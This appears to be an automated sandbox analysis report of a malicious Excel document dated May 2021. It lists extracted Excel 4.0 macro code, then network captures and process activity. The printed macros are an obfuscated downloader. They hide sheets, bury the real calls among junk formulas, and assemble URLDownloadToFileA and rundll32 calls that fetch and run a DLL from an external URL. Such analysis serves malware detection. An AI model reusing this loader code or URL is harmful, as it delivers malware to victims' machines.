File Type: | Applesoft BASIC program data, first line number 8 |
Stream Size: | 275392 |
Entropy: | 3.23578403018 |
Base64 Encoded: | True |
Data ASCII: | . . . . . . . . . 7 . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . 5 B . . . . . . . . . . . . . . . . . . . . . . . S h e e t 2 . . ! . . . . . . . . . . . . . . . : . . . . . . . . . . . . . . . . 4 . . . . . . . . . . . . . . . . . . = . . . . . i . . 9 J . 8 . . . . . . . X |
Data Raw: | 09 08 08 00 00 05 05 00 17 37 cd 07 e1 00 00 00 c1 00 02 00 00 00 bf 00 00 00 c0 00 00 00 e2 00 00 00 5c 00 70 00 01 35 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 |
Macro 4.0 Code |
---|
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,https://obsusa.net/chemgrcr.dll,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=""..\qqjdkdl.obp""",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=WORKBOOK.HIDE(""Sheet2"")=WORKBOOK.HIDE(""Sheet3"")=WORKBOOK.HIDE(""Sheet4"")=WORKBOOK.HIDE(""Sheet5"")",,,,,,,,,,,,,,,,,,,,,,=HALT(),,,,,,,,,,JJC,,,,,,,,,,,,,,,,,,,,,U,,,,,,,,,,,,,,,,,,,,,,R,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,D,,,,,,,,,,,,,,,,,,,,L,,,,,CBB,,,,,,,,,,,,,,,,,,,,L,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,w,o,,,,,,,,,,,,,,,,,,M,,,,,,,,,,,,,,,"=LEFT(""URdndiond"",2)",,,,,,,o,,,,n,,,,,,,,,,,,,,,,,,,,l,,,,,,,,,,,,,,,,,,,,,n,,,o,,,0,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,0,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,rund,,,,,,,,,,,,,,,,,,,,,,,,,,0,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,",St",,,,,,,,,,,,,,,,,,,,"=""ll32 """,,ar,,,,,,,,,,,,,,,,,,,,,,tW,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
=ASIN(456346564848556)=ACOS(45654645646546)=ASIN(45654686846846)=ASIN(456346564848556)=ACOS(45654645646546)=ASIN(45654686846846)=ASIN(456346564848556)=ACOS(45654645646546)=ASIN(45654686846846)=ASIN(456346564848556)=ACOS(45654645646546)=ASIN(45654686846846)=ASIN(456346564848556)=ACOS(45654645646546)=ASIN(45654686846846)=ASIN(456346564848556)=ACOS(45654645646546)=ASIN(45654686846846)=ASIN(456346564848556)=ACOS(45654645646546)=ASIN(45654686846846)=EXEC(Sheet3!BN47&Sheet3!BM53&Sheet3!BU19&Sheet3!BO52&Sheet3!BO53&Sheet3!BO54)=ASIN(456346564848556)=ACOS(45654645646546)=ASIN(45654686846846)=ASIN(456346564848556)=ACOS(45654645646546)=ASIN(45654686846846)=ASIN(456346564848556)=ACOS(45654645646546)=ASIN(45654686846846)=ASIN(456346564848556)=ACOS(45654645646546)=ASIN(45654686846846)=ASIN(456346564848556)=ACOS(45654645646546)=ASIN(45654686846846)=ASIN(456346564848556)=ACOS(45654645646546)=ASIN(45654686846846)=ASIN(456346564848556)=ACOS(45654645646546)=ASIN(45654686846846)=ASIN(456346564848556)=ACOS(45654645646546)=ASIN(45654686846846)=ASIN(456346564848556)=ACOS(45654645646546)=ASIN(45654686846846)=ASIN(456346564848556)=ACOS(45654645646546)=ASIN(45654686846846)=ASIN(456346564848556)=ACOS(45654645646546)=ASIN(45654686846846)=ASIN(456346564848556)=ACOS(45654645646546)=ASIN(45654686846846)=ACOS(45654645646546)=ASIN(45654686846846)=ASIN(456346564848556)=ACOS(45654645646546)=ASIN(45654686846846)=ASIN(456346564848556)=ACOS(45654645646546)=ASIN(45654686846846)=ASIN(456346564848556)=ACOS(45654645646546)=ASIN(45654686846846)=ASIN(456346564848556)=ACOS(45654645646546)=ASIN(45654686846846)=RUN(Sheet3!BG25)=ASIN(456346564848556)=ACOS(45654645646546)=ASIN(45654686846846)
"=IF(5+5,""dfdsfdsfds4fds85f48e18es1f8esf65d1f"",""sd4f81ds5f1e51f5ds1fe1fs351fe5s1f51h5y1j5y1h2t1gfg"")=IF(5+5,""dfdsfdsfds4fds85f48e18es1f8esf65d1f"",""sd4f81ds5f1e51f5ds1fe1fs351fe5s1f51h5y1j5y1h2t1gfg"")=IF(5+5,""dfdsfdsfds4fds85f48e18es1f8esf65d1f"",""sd4f81ds5f1e51f5ds1fe1fs351fe5s1f51h5y1j5y1h2t1gfg"")=CALL(Sheet3!CA36&Sheet3!BM32&Sheet3!BL36&Sheet3!BL37&Sheet3!BM39,Sheet3!BP28&Sheet3!BP29&Sheet3!BP33&Sheet3!BO31&Sheet3!BP35&Sheet3!BO35&Sheet3!BP37&Sheet3!BN38&Sheet3!BP39&Sheet5!BM31&Sheet5!BF30,Sheet3!BQ27&Sheet3!BR32,Sheet3!BQ41,Sheet3!BU15,Sheet3!BU19,Sheet3!BR48,Sheet3!BS39)=Sheet4!BH32()&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&"""""
Network Behavior |
---|
Network Port Distribution |
---|
TCP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
May 4, 2021 10:57:44.492187023 CEST | 49711 | 443 | 192.168.2.5 | 170.249.236.47 |
May 4, 2021 10:57:44.631474018 CEST | 443 | 49711 | 170.249.236.47 | 192.168.2.5 |
May 4, 2021 10:57:44.631674051 CEST | 49711 | 443 | 192.168.2.5 | 170.249.236.47 |
May 4, 2021 10:57:44.633119106 CEST | 49711 | 443 | 192.168.2.5 | 170.249.236.47 |
May 4, 2021 10:57:44.770663977 CEST | 443 | 49711 | 170.249.236.47 | 192.168.2.5 |
May 4, 2021 10:57:44.771298885 CEST | 443 | 49711 | 170.249.236.47 | 192.168.2.5 |
May 4, 2021 10:57:44.771323919 CEST | 443 | 49711 | 170.249.236.47 | 192.168.2.5 |
May 4, 2021 10:57:44.771344900 CEST | 443 | 49711 | 170.249.236.47 | 192.168.2.5 |
May 4, 2021 10:57:44.771368027 CEST | 443 | 49711 | 170.249.236.47 | 192.168.2.5 |
May 4, 2021 10:57:44.771409988 CEST | 49711 | 443 | 192.168.2.5 | 170.249.236.47 |
May 4, 2021 10:57:44.771476984 CEST | 49711 | 443 | 192.168.2.5 | 170.249.236.47 |
May 4, 2021 10:57:44.772592068 CEST | 443 | 49711 | 170.249.236.47 | 192.168.2.5 |
May 4, 2021 10:57:44.772718906 CEST | 49711 | 443 | 192.168.2.5 | 170.249.236.47 |
May 4, 2021 10:57:44.818700075 CEST | 49711 | 443 | 192.168.2.5 | 170.249.236.47 |
May 4, 2021 10:57:44.956532955 CEST | 443 | 49711 | 170.249.236.47 | 192.168.2.5 |
May 4, 2021 10:57:44.956737041 CEST | 49711 | 443 | 192.168.2.5 | 170.249.236.47 |
May 4, 2021 10:57:44.957715988 CEST | 49711 | 443 | 192.168.2.5 | 170.249.236.47 |
May 4, 2021 10:57:45.134879112 CEST | 443 | 49711 | 170.249.236.47 | 192.168.2.5 |
May 4, 2021 10:57:46.115010977 CEST | 443 | 49711 | 170.249.236.47 | 192.168.2.5 |
May 4, 2021 10:57:46.115048885 CEST | 443 | 49711 | 170.249.236.47 | 192.168.2.5 |
May 4, 2021 10:57:46.115072966 CEST | 443 | 49711 | 170.249.236.47 | 192.168.2.5 |
May 4, 2021 10:57:46.115094900 CEST | 443 | 49711 | 170.249.236.47 | 192.168.2.5 |
May 4, 2021 10:57:46.115111113 CEST | 443 | 49711 | 170.249.236.47 | 192.168.2.5 |
May 4, 2021 10:57:46.115117073 CEST | 49711 | 443 | 192.168.2.5 | 170.249.236.47 |
May 4, 2021 10:57:46.115128040 CEST | 443 | 49711 | 170.249.236.47 | 192.168.2.5 |
May 4, 2021 10:57:46.115154028 CEST | 49711 | 443 | 192.168.2.5 | 170.249.236.47 |
May 4, 2021 10:57:46.115201950 CEST | 49711 | 443 | 192.168.2.5 | 170.249.236.47 |
May 4, 2021 10:57:46.118524075 CEST | 49711 | 443 | 192.168.2.5 | 170.249.236.47 |
May 4, 2021 10:57:46.118561029 CEST | 49711 | 443 | 192.168.2.5 | 170.249.236.47 |
May 4, 2021 10:57:46.256160021 CEST | 443 | 49711 | 170.249.236.47 | 192.168.2.5 |
May 4, 2021 10:57:46.256263971 CEST | 49711 | 443 | 192.168.2.5 | 170.249.236.47 |
UDP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
May 4, 2021 10:57:25.074767113 CEST | 65307 | 53 | 192.168.2.5 | 8.8.8.8 |
May 4, 2021 10:57:25.132060051 CEST | 53 | 65307 | 8.8.8.8 | 192.168.2.5 |
May 4, 2021 10:57:25.860224962 CEST | 64344 | 53 | 192.168.2.5 | 8.8.8.8 |
May 4, 2021 10:57:25.909481049 CEST | 53 | 64344 | 8.8.8.8 | 192.168.2.5 |
May 4, 2021 10:57:26.035655975 CEST | 62060 | 53 | 192.168.2.5 | 8.8.8.8 |
May 4, 2021 10:57:26.065599918 CEST | 61805 | 53 | 192.168.2.5 | 8.8.8.8 |
May 4, 2021 10:57:26.093810081 CEST | 53 | 62060 | 8.8.8.8 | 192.168.2.5 |
May 4, 2021 10:57:26.117073059 CEST | 53 | 61805 | 8.8.8.8 | 192.168.2.5 |
May 4, 2021 10:57:26.927946091 CEST | 54795 | 53 | 192.168.2.5 | 8.8.8.8 |
May 4, 2021 10:57:26.976722002 CEST | 53 | 54795 | 8.8.8.8 | 192.168.2.5 |
May 4, 2021 10:57:27.826680899 CEST | 49557 | 53 | 192.168.2.5 | 8.8.8.8 |
May 4, 2021 10:57:27.875624895 CEST | 53 | 49557 | 8.8.8.8 | 192.168.2.5 |
May 4, 2021 10:57:28.830481052 CEST | 61733 | 53 | 192.168.2.5 | 8.8.8.8 |
May 4, 2021 10:57:28.890358925 CEST | 53 | 61733 | 8.8.8.8 | 192.168.2.5 |
May 4, 2021 10:57:28.985946894 CEST | 65447 | 53 | 192.168.2.5 | 8.8.8.8 |
May 4, 2021 10:57:29.048388958 CEST | 53 | 65447 | 8.8.8.8 | 192.168.2.5 |
May 4, 2021 10:57:30.118390083 CEST | 52441 | 53 | 192.168.2.5 | 8.8.8.8 |
May 4, 2021 10:57:30.169907093 CEST | 53 | 52441 | 8.8.8.8 | 192.168.2.5 |
May 4, 2021 10:57:31.080326080 CEST | 62176 | 53 | 192.168.2.5 | 8.8.8.8 |
May 4, 2021 10:57:31.131865025 CEST | 53 | 62176 | 8.8.8.8 | 192.168.2.5 |
May 4, 2021 10:57:32.045290947 CEST | 59596 | 53 | 192.168.2.5 | 8.8.8.8 |
May 4, 2021 10:57:32.096545935 CEST | 53 | 59596 | 8.8.8.8 | 192.168.2.5 |
May 4, 2021 10:57:37.275358915 CEST | 65296 | 53 | 192.168.2.5 | 8.8.8.8 |
May 4, 2021 10:57:37.328233957 CEST | 53 | 65296 | 8.8.8.8 | 192.168.2.5 |
May 4, 2021 10:57:38.303996086 CEST | 63183 | 53 | 192.168.2.5 | 8.8.8.8 |
May 4, 2021 10:57:38.352650881 CEST | 53 | 63183 | 8.8.8.8 | 192.168.2.5 |
May 4, 2021 10:57:38.511643887 CEST | 60151 | 53 | 192.168.2.5 | 8.8.8.8 |
May 4, 2021 10:57:38.606848001 CEST | 53 | 60151 | 8.8.8.8 | 192.168.2.5 |
May 4, 2021 10:57:39.152005911 CEST | 56969 | 53 | 192.168.2.5 | 8.8.8.8 |
May 4, 2021 10:57:39.243449926 CEST | 53 | 56969 | 8.8.8.8 | 192.168.2.5 |
May 4, 2021 10:57:40.164068937 CEST | 56969 | 53 | 192.168.2.5 | 8.8.8.8 |
May 4, 2021 10:57:40.224219084 CEST | 53 | 56969 | 8.8.8.8 | 192.168.2.5 |
May 4, 2021 10:57:41.179500103 CEST | 56969 | 53 | 192.168.2.5 | 8.8.8.8 |
May 4, 2021 10:57:41.258758068 CEST | 53 | 56969 | 8.8.8.8 | 192.168.2.5 |
May 4, 2021 10:57:43.179759026 CEST | 56969 | 53 | 192.168.2.5 | 8.8.8.8 |
May 4, 2021 10:57:43.246964931 CEST | 53 | 56969 | 8.8.8.8 | 192.168.2.5 |
May 4, 2021 10:57:44.377614021 CEST | 55161 | 53 | 192.168.2.5 | 8.8.8.8 |
May 4, 2021 10:57:44.426377058 CEST | 53 | 55161 | 8.8.8.8 | 192.168.2.5 |
May 4, 2021 10:57:44.429295063 CEST | 54757 | 53 | 192.168.2.5 | 8.8.8.8 |
May 4, 2021 10:57:44.489265919 CEST | 53 | 54757 | 8.8.8.8 | 192.168.2.5 |
May 4, 2021 10:57:45.349729061 CEST | 49992 | 53 | 192.168.2.5 | 8.8.8.8 |
May 4, 2021 10:57:45.398400068 CEST | 53 | 49992 | 8.8.8.8 | 192.168.2.5 |
May 4, 2021 10:57:47.200417042 CEST | 56969 | 53 | 192.168.2.5 | 8.8.8.8 |
May 4, 2021 10:57:47.252237082 CEST | 53 | 56969 | 8.8.8.8 | 192.168.2.5 |
May 4, 2021 10:57:51.654570103 CEST | 60075 | 53 | 192.168.2.5 | 8.8.8.8 |
May 4, 2021 10:57:51.716954947 CEST | 53 | 60075 | 8.8.8.8 | 192.168.2.5 |
May 4, 2021 10:58:03.910079956 CEST | 55016 | 53 | 192.168.2.5 | 8.8.8.8 |
May 4, 2021 10:58:03.959122896 CEST | 53 | 55016 | 8.8.8.8 | 192.168.2.5 |
May 4, 2021 10:58:19.266011953 CEST | 64345 | 53 | 192.168.2.5 | 8.8.8.8 |
May 4, 2021 10:58:19.327101946 CEST | 53 | 64345 | 8.8.8.8 | 192.168.2.5 |
May 4, 2021 10:58:21.256779909 CEST | 57128 | 53 | 192.168.2.5 | 8.8.8.8 |
May 4, 2021 10:58:21.305424929 CEST | 53 | 57128 | 8.8.8.8 | 192.168.2.5 |
May 4, 2021 10:58:58.164371014 CEST | 54791 | 53 | 192.168.2.5 | 8.8.8.8 |
May 4, 2021 10:58:58.212918043 CEST | 53 | 54791 | 8.8.8.8 | 192.168.2.5 |
May 4, 2021 10:59:04.849445105 CEST | 50463 | 53 | 192.168.2.5 | 8.8.8.8 |
May 4, 2021 10:59:04.903203011 CEST | 53 | 50463 | 8.8.8.8 | 192.168.2.5 |
May 4, 2021 10:59:24.440581083 CEST | 50394 | 53 | 192.168.2.5 | 8.8.8.8 |
May 4, 2021 10:59:24.518346071 CEST | 53 | 50394 | 8.8.8.8 | 192.168.2.5 |
May 4, 2021 10:59:33.978415012 CEST | 58530 | 53 | 192.168.2.5 | 8.8.8.8 |
May 4, 2021 10:59:34.027230978 CEST | 53 | 58530 | 8.8.8.8 | 192.168.2.5 |
May 4, 2021 10:59:36.338891029 CEST | 53813 | 53 | 192.168.2.5 | 8.8.8.8 |
May 4, 2021 10:59:36.396197081 CEST | 53 | 53813 | 8.8.8.8 | 192.168.2.5 |
DNS Queries |
---|
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
---|---|---|---|---|---|---|---|
May 4, 2021 10:57:44.429295063 CEST | 192.168.2.5 | 8.8.8.8 | 0x67c | Standard query (0) | A (IP address) | IN (0x0001) |
DNS Answers |
---|
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
---|---|---|---|---|---|---|---|---|---|
May 4, 2021 10:57:44.489265919 CEST | 8.8.8.8 | 192.168.2.5 | 0x67c | No error (0) | 170.249.236.47 | A (IP address) | IN (0x0001) |
HTTPS Packets |
---|
Timestamp | Source IP | Source Port | Dest IP | Dest Port | Subject | Issuer | Not Before | Not After | JA3 SSL Client Fingerprint | JA3 SSL Client Digest |
---|---|---|---|---|---|---|---|---|---|---|
May 4, 2021 10:57:44.772592068 CEST | 170.249.236.47 | 443 | 192.168.2.5 | 49711 | CN=obsusa.net CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB | CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GB | Thu Apr 15 02:00:00 CEST 2021 Mon May 18 02:00:00 CEST 2015 Thu Jan 01 01:00:00 CET 2004 | Thu Jul 15 01:59:59 CEST 2021 Sun May 18 01:59:59 CEST 2025 Mon Jan 01 00:59:59 CET 2029 | 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0 | 37f463bf4616ecd445d4a1937da06e19 |
CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US | CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB | Mon May 18 02:00:00 CEST 2015 | Sun May 18 01:59:59 CEST 2025 | |||||||
CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB | CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GB | Thu Jan 01 01:00:00 CET 2004 | Mon Jan 01 00:59:59 CET 2029 |
Code Manipulations |
---|
Statistics |
---|
Behavior |
---|
Click to jump to process
System Behavior |
---|
General |
---|
Start time: | 10:57:36 |
Start date: | 04/05/2021 |
Path: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x1280000 |
File size: | 27110184 bytes |
MD5 hash: | 5D6638F2C8F8571C593999C58866007E |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 10:57:45 |
Start date: | 04/05/2021 |
Path: | C:\Windows\SysWOW64\rundll32.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0xf40000 |
File size: | 61952 bytes |
MD5 hash: | D7CA562B0DB4F4DD0F03A89A1FDAD63D |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Disassembly |
---|
Code Analysis |
---|